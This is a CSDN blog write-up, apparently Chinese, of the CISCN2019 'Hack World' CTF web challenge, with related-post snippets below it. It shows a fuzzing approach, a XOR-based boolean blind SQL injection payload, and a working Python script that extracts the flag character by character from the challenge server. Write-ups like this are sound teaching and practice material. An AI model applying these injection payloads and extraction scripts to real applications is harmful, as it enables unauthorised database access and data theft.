[CISCN2019 华北赛区 Day2 Web1]Hack World -wp

最新推荐文章于 2022-07-03 12:18:42 发布
最新推荐文章于 2022-07-03 12:18:42 发布
阅读量272 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/106978463
版权

在这里插入图片描述可以在页面上看到提示,flag在flag表flag列里
在查询0,1,2时会获得不同的回显,
0回显:Error Occured When Fetch Result.
1:Hello, glzjin wants a girlfriend
2:Do you want to be my girlfriend?
初步判断0字段应该不存在,1,2存在
在这里插入图片描述尝试输入or时发现被ban,我们可以fuzz一下
在这里插入图片描述长为482的都是不允许的
可以发现select,from,where这些常用注入字符都可以使用
题目过滤了双引号,导致很难闭合去构造语句。
这道题需要使用基于异或的boolean盲注
在这里插入图片描述
发现0^1可以正常回显,而0^0回显不同

id=0^(ascii(substr((select(flag)from(flag)),1,1))>0)

在这里插入图片描述接下来就可以使用脚本去跑了,这个网站有着流量的限制,大概跑一百次左右就会无法访问,最快的方法就是二分法查找(由于本人编程功底较差,使用的二分法有几个字符跑不出来,只能多花一点时间用sleep)。
以下脚本是使用sleep函数的脚本,跑出flag大概需要三分钟左右

import requests
import time

url = "http://29605588-3929-45e2-857c-e0742fa691ae.node3.buuoj.cn/index.php"
payload = {
	"id" : ""
}
flag = ""
for i in range(1,50):
	for m in range(29,129):
		payload["id"] = "0^(ascii(substr((select(flag)from(flag)),{0},1))={1})".format(i,m)
		html = requests.post(url,data=payload)

		if "Hello, glzjin wants a girlfriend" in html.text:
			break;
	if m>128:
		continue
	flag=flag+chr(m)
	print(flag)
	time.sleep(5)
	```
冰可乐不加可乐
关注
[CISCN2019 华北赛区 Day2 Web1]Hack World
qi_SJQ_的博客
10-29 286
拿到一道sql注入题思路: 测试过滤:可以bp加字典fuzzing一下,看过滤哪些字符: 找的大佬的fuzzing字典: ` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } | \ ; : ' " , . < > / ? -- --+ /**/ && || <> !(<>) and or xor if not select sleep union from where order by concat group b
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World-wp
居上
08-10 341
[CISCN2019 华北赛区 Day2 Web1]Hack World 知识点 fuzz python盲注脚本 过程 fuzz一哈 一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等 贴上脚本: import requests url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php" result = "" num = 0 # 用
BUUCTF - Web - [CISCN2019 华北赛区 Day2 Web1]Hack World
1tachi的博客
12-18 303
[CISCN2019 华北赛区 Day2 Web1]Hack World 测试 id=1 id=2 fuzz 一下,空格/union/order by/updatexml/and/or等字符 分析 尝试盲注,题目给出表及字段,使用异或连接,用括号代替空格 0^(ascii(substr((select(flag)from(flag)),1,1))>1) 脚本 import requests url="http://9fbcd2c9-29c1-45ee-8aa2-d17756ace4c0.no
【复习】[CISCN2019 华北赛区 Day2 Web1]Hack World -----sql注入
Zero_Adam的博客
05-16 428
目录:一、自己做:二、 学到的:不足: 一、自己做: 输入1和2 的时候是有正常的查询结果的。然后输入3的话就超过了。 输入其他的,不是id数字的就直接bool (false) 然后fuzz测试:482是给过滤的。 过滤了不少,仔细看一下, handler过滤了。像强网杯的那些就不行了。 information 被过滤了。可以用那些sys来查找表明,然后用无列名注入就好。 limit 被过滤了。要么就union select 要么就不用了。 或,与过滤了。可以用 ^异或。 空格,注释符,/**/
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
qq_43618536的博客
07-03 549
BUUCTF的[CISCN2019 华北赛区 Day2 Web1]Hack World 1 盲注
[CISCN2019 华北赛区 Day2 Web1]Hack World题解
qq_52843575的博客
04-07 3315
[CISCN2019 华北赛区 Day2 Web1]Hack World题解 判断类型 进入页面很明显就是考sql注入,与此同时页面直接告诉你表面和列名均是flag,直接开始注入,常用的注入函数均被过滤,直接fuzz爆破,查看被过滤的具体情况 结果确定此题为sql中的布尔盲注(post传参),也同时发现一个问题,请求过快时,会被过滤掉请求 确认绕过方法 因为or被过滤,百度一波后,发现可以使用^异或来绕过 异或:相同为假,相异为真,简单来说就是 1^1=0 0^0=0 1^0=1 空格也被过滤,因此
[ciscn2019 华北赛区 day1 web1]dropbox
最新发布
06-06
这是一道Web安全题目,要求我们通过访问网站,获取到flag。 题目中给出了一个网站地址,我们可以直接访问该网站。进入网站后,我们可以看到一个登录界面,要求我们输入用户名和密码。 我们可以尝试一些常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值